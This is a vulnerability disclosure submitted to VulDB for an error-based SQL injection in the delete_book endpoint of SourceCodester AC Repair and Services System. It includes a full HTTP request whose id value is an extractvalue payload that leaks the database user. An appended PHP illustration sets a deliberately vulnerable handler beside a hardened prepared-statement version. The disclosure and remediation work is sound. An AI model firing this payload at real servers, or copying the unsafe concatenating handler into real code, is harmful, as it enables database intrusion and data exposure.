Submission #180827: SourceCodester AC Repair and Services System HTTP POST Request sql injection in Master.php

Information

Title: SourceCodester AC Repair and Services System HTTP POST Request sql injection in Master.php

Description: I found a SQL injection in SourceCodester AC Repair and Services System (https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html). It is a SQL injection in url/classes/Master.php?f=delete_book.

POST /php-acrss/classes/Master.php?f=delete_book HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------25039842273186474810708140780
Content-Length: 906
Origin: http://localhost
Connection: close
Referer: http://localhost/php-acrss/admin/?page=bookings/manage_booking
Cookie: PHPSESSID=sg18q6cststuaq0t07v6hdppgc
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------25039842273186474810708140780
Content-Disposition: form-data; name="id"

1' or (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
-----------------------------25039842273186474810708140780
Content-Disposition: form-data; name="fullname"

1
-----------------------------25039842273186474810708140780
Content-Disposition: form-data; name="email"

1
-----------------------------25039842273186474810708140780
Content-Disposition: form-data; name="contact"

1
-----------------------------25039842273186474810708140780
Content-Disposition: form-data; name="address"

1
-----------------------------25039842273186474810708140780
Content-Disposition: form-data; name="services[]"

1
-----------------------------25039842273186474810708140780
Content-Disposition: form-data; name="status"

1
-----------------------------25039842273186474810708140780--

And it returns "{"status":"failed","error":"XPATH syntax error: '~admin@localhost~'"}". Obviously, there is an error injection vulnerability here due to insufficient filtering of the id parameter. My suggestion for modification is to use mysqli_real_escape_string() to protect controllable id parameters from malicious exploitation by hackers resulting in SQL error injection.

Source: https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html
User: fushuling (UID 45488)
Submitted: 11.07.2023 17:42 (3 years ago)
Moderated: 13.07.2023 11:49 (2 days later)
Status: accepted
VulDB entry: 234012 [SourceCodester AC Repair and Services System 1.0 HTTP POST Request Master.php?f=delete_book id sql injection]
Points: 20
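The delete_book handler the submission describes, as an added illustration that is not code from the AC Repair and Services System or from the submitter: a hypothetical handler in the string-concatenating form the reported error message implies, beside a hardened form that validates the posted id as an integer, binds it through a mysqli prepared statement, and keeps driver errors out of the JSON response. The class and method names, the `bookings` table, and the connection parameters are assumptions made for this example.

```php
<?php
// Added illustration, not code from the AC Repair and Services System.
// Assumptions: a `bookings` table keyed by an integer `id`, and a handler
// that answers Master.php?f=delete_book with a JSON status object.
declare(strict_types=1);

mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // driver errors become exceptions

final class BookingRepository
{
    public function __construct(private mysqli $db)
    {
    }

    // The pattern the report implies: the posted id is spliced into the SQL
    // text and the driver's error message is returned to the client, which is
    // exactly what an error-based injection relies on (here: an XPATH error).
    public function deleteBookingUnsafe(string $id): array
    {
        try {
            $this->db->query("DELETE FROM `bookings` WHERE id = '{$id}'");
        } catch (mysqli_sql_exception $e) {
            return ['status' => 'failed', 'error' => $e->getMessage()];
        }
        return ['status' => 'success'];
    }

    // Hardened form: the id must be a positive integer, it is bound as a
    // parameter so it can never change the statement text, and driver errors
    // are logged server-side instead of being echoed to the caller.
    public function deleteBooking(string $id): array
    {
        // FILTER_VALIDATE_INT rejects anything that is not a canonical integer,
        // so a value such as "1' or ..." never reaches the database at all.
        $bookingId = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
        if ($bookingId === false) {
            return ['status' => 'failed', 'error' => 'invalid id'];
        }

        try {
            $stmt = $this->db->prepare('DELETE FROM `bookings` WHERE id = ?');
            $stmt->bind_param('i', $bookingId);
            $stmt->execute();
            $deleted = $stmt->affected_rows;
            $stmt->close();
        } catch (mysqli_sql_exception $e) {
            error_log('delete_book failed: ' . $e->getMessage()); // log, do not echo
            return ['status' => 'failed', 'error' => 'database error'];
        }

        return ['status' => 'success', 'deleted' => $deleted];
    }
}

// Entry point (connection parameters are constructed for this example).
$db = new mysqli('localhost', 'app_user', 'app_password', 'php_acrss');
$repo = new BookingRepository($db);
header('Content-Type: application/json');
echo json_encode($repo->deleteBooking((string) ($_POST['id'] ?? '')));
```

Two points on the design. mysqli_real_escape_string() only neutralises quote characters inside a quoted string literal; it does nothing if the value is interpolated unquoted into a numeric comparison, and it does not stop the application from returning the raw driver error that made this finding error-based in the first place. Validating the id as an integer and binding it as a parameter removes the injection regardless of how the query is quoted, and returning a generic error string while logging the real one removes the information channel.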
